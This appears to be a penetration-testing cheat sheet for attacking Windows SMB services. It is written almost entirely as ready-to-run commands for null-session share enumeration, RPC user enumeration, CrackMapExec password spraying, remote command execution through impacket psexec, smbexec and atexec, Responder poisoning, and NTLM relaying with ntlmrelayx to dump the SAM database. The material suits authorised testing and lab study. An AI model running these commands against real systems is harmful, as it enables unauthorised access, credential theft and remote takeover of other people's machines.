🦁SMB

Enumeration

sudo nmap IP -sV -sC -p139,445

Anonymous Authentication

smbclient -N -L //IP
  • -L List shares

  • -N Uses null session

smbmap -H IP
smbmap -H IP -r SHARENAME
smbmap -H IP --download "notes\note.txt"
smbmap -H IP --upload"notes\test.txt"

RPC Remote Procedure Call

rpcclient -U'%' IP
> enumdomusers
./enum4linux-ng.py 10.10.11.45 -A -C

Password Attacks

CME Password Spraying

We use --local-auth if targeting a non-domain joined computer

crackmapexec smb IP -u userlist.txt -p 'password!' --local-auth

--continue-on-success flag will continue spraying even after a valid password is found.

RCE - Remote Code Execution

Using PsExec we can execute processes on remote systems along with full interactive console application all without the need to install any software manually

Impacket PsExec

impacket-psexec administrator:'password!'@IP
impacket-smbexec administrator:'password!'@IP
impacket-atexec administrator:'password!'@IP

CME Command Execution

crackmapexec smb 10.10.110.17 -u Administrator -p 'password' -x 'whoami' --exec-method smbexec
  • -x Run a command

  • -X Run PowerShell commands

CME Enumerating Users Logged In

crackmapexec smb 10.10.110.17 -u Administrator -p 'password' --loggedon-users

Remote Dumping

Forced Authentication

SMB Relays

responder -I <interface name>

Impacket-ntlmrelayx

## /etc/responder/Responder.conf
SMB = Off

Dump SAM database

impacket-ntlmrelayx --no-http-server -smb2support -t IP

Latest Vulnerabilities

SMBGhost

Last updated

Was this helpful?